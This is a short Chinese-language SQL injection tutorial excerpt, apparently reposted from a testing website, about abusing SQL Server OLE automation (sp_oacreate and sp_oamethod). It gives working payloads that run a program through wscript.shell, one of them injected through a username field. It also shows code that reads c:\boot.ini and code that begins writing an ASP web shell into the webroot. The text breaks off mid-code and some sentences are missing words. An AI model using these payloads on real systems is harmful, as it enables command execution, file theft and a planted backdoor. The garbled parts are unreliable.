wscript.shell example
declare @o int
exec sp_oacreate 'wscript.shell',@o out
exec sp_oamethod @o,'run',NULL,'notepad.exe'
我们可以通过指定在用户名后面来执行它:
Username:'; declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'notepad.exe'—
(2)这个例子使用'scripting.filesystemobject'对象读一个已知的文本文件:
--scripting.filesystemobject example – read a known file
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
exec @ret=sp_oamethod @f,'readline',@line out
while(@ret=0)
begin
print @line
exec @ret=sp_oamethod @f,'readline',@line out
end
(3)这个例子创建了一个能执行通过提交到的任何命令:
-- scripting.filesystemobject example – create a 'run this'.asp file
declare @o int,@f int,@t int,@ret int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'createtextfile',@f out,'c:\.netpub\wwwroot\foo.asp',1
文章来源于领测软件测试网 https://www.ltesting.net/
